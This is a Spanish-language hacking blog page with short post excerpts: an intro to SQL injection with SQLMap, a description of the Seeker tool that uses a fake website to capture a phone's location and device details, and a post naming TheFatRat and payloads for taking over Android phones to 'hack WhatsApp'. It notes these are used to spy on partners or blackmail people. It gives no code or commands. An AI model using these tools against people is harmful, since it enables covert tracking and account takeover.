Esperamos que este tutorial les haya sido útil y les recordamos que pueden suscribirse a nuestro blog en el botón azul que dice "seguir" para recibir más tutoriales de hacking y formas legales de ahorrar dinero en internet.

Tutorial SQL Injection - Como Usar SQLMap


SQL injection. 'Ataque a ciegas por inyección SQL'

Tutorial SQL Injection  aprender a  usar SQLMap

Sqlmap es una herramienta desarrollada en el lenguaje python y es muy útil para hacer inyecciones sql automatizados. Su objetivo es detectar y aprovechar las vulnerabilidades de inyección SQL en aplicaciones web.

En el dia de hoy traemos para los lectores del blog una introducción a lo que es el sql injection y a como usar la herramienta open source, SQLmap para poder realizar las tareas de pentesting que debemos realizar.  Sin más aquí dejamos el tutorial y si tienen alguna pregunta o comentario no olviden dejarlo abajo en la caja de comentarios. Hasta luego y buen hacking.

Tutorial: Geolocalización de celulares de alta precisión con Seeker y Ngrok en Parrot OS



Seeker alberga un sitio web falso en el servidor Apache y utiliza Ngrok para generar un enlace SSL que solicita el permiso de ubicación en el celular mediante un link y, si el usuario lo permite en su celular, podemos obtener:

Longitud
Latitud
Exactitud
Altitud - No siempre disponible
Dirección: solo disponible si el usuario se está moviendo
Velocidad: sólo disponible si el usuario se está moviendo

Junto con la información de ubicación, también podemos obtener información del dispositivo sin ningún permiso:

Sistema operativo
Plataforma
Número de núcleos de CPU
Cantidad de RAM - Resultados aproximados
Resolución de la pantalla
Información de la GPU
Nombre y versión del navegador

¿Como hackear whatsapp? - 3 Formas en las cuales los hackers pueden hackear tu whatsapp

DISCLAIMER: Antes que nada, recuerda que para que cualquier truco de hacking que  aquí  te mostramos funcione, para descargar software del blog y por supuesto, para hackear whatsapp, debes suscribirte al blog en la barra que encontrarás más arriba dándole al botón azul que dice seguir.


Hola a todos. ¿Es posible hackear whatsapp? El dia de hoy vengo a traer este post que muestra 3 maneras en las cuales los hackers pueden hacer uso de herramientas predeterminadas para hackear tu whatsapp. Esto lo hace la gente ya que muchas personas quieren espiar a su pareja, o se puede usar para hacer chantajes a un objetivo determinado. 

Desde este blog te recordamos que  hacer eso es ilegal y que la información está  protegida en las diferentes legislaciones alrededor del planeta, así que mucho cuidado con la información que aquí consigas  y la forma en la cual la usas. Ya sabiendo eso, empecemos. 

1) The fat rat

Thefatrat es un script que está a disposición gratuita en github, y que sirve precisamente para el hackeo de cualquier sistema android. Si bien en un principio la instalación es una batalla, ya cuando aprendes a utilizar el software, cualquier teléfono estará a tu disposición. Desde este blog se recomienda que la herramienta sea utilizada solo en los dispositivos de los cuales ustedes sean dueños o en los cuales tengan permiso de hacerlo.



2) Payload clásico

Esta es, quizá, la estrategia que se usa por defecto para realizar las acciones de hacking en un teléfono. ya que  es una explicación bastante larga, dejo a su disposición el tutorial completo para que aprendan a hacerlo ustedes mismos. OJO: este sistema solo sirve en redes LAN.

3) Las técnicas de youtube

Increíblemente, hay más de una técnica que esta publicada en youtube sobre como realizar métodos de hacking en whatsapp y, de hecho, algunos funcionan. Aqui traigo un par que encontré  que son posibles, demostrando con esto que no solo no es necesario saber de hacking para hackear un whatsapp, sino que las herramientas para realizar esta tarea son gratuitas y están distribuidas por todo el internet y publicadas en sitios tan visitados como youtube.